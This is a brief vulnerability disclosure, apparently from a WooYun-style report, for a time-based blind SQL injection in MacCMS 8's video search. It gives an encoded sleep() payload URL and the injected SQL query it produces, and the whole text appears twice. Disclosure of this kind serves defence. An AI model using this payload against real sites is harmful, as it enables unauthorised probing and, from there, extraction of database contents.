VULHUB ™

### 简要描述： 苹果CMS SQL注入一枚 ### 详细说明： 分析参考： http://wooyun.org/bugs/wooyun-2014-066661 利用参考: http://wooyun.org/bugs/wooyun-2014-074281 这里就不做代码分析了： 访问url： http://localhost/maccms8/index.php?m=vod-search-pg-1-wd-xxxx%2527%2529%253E0%2520or%2520sleep%2528if%25281%252C5%252C1%2529%2529%2529%2523-typeid-5.html 延时5秒即可 抓取sql语句 SELECT count(*) FROM mac_vod WHERE 1=1 AND ( instr(d_name,'xxxx')>0 or sleep(if(1,5,1)))#')>0 or instr(d_starring,'xxxx')>0 or sleep(if(1,5,1)))#')>0 ) AND d_type in (5) and d_type not in(0) and d_usergroup in(0) ### 漏洞证明：

### 简要描述： 苹果CMS SQL注入一枚 ### 详细说明： 分析参考： http://wooyun.org/bugs/wooyun-2014-066661 利用参考: http://wooyun.org/bugs/wooyun-2014-074281 这里就不做代码分析了： 访问url： http://localhost/maccms8/index.php?m=vod-search-pg-1-wd-xxxx%2527%2529%253E0%2520or%2520sleep%2528if%25281%252C5%252C1%2529%2529%2529%2523-typeid-5.html 延时5秒即可 抓取sql语句 SELECT count(*) FROM mac_vod WHERE 1=1 AND ( instr(d_name,'xxxx')>0 or sleep(if(1,5,1)))#')>0 or instr(d_starring,'xxxx')>0 or sleep(if(1,5,1)))#')>0 ) AND d_type in (5) and d_type not in(0) and d_usergroup in(0) ### 漏洞证明：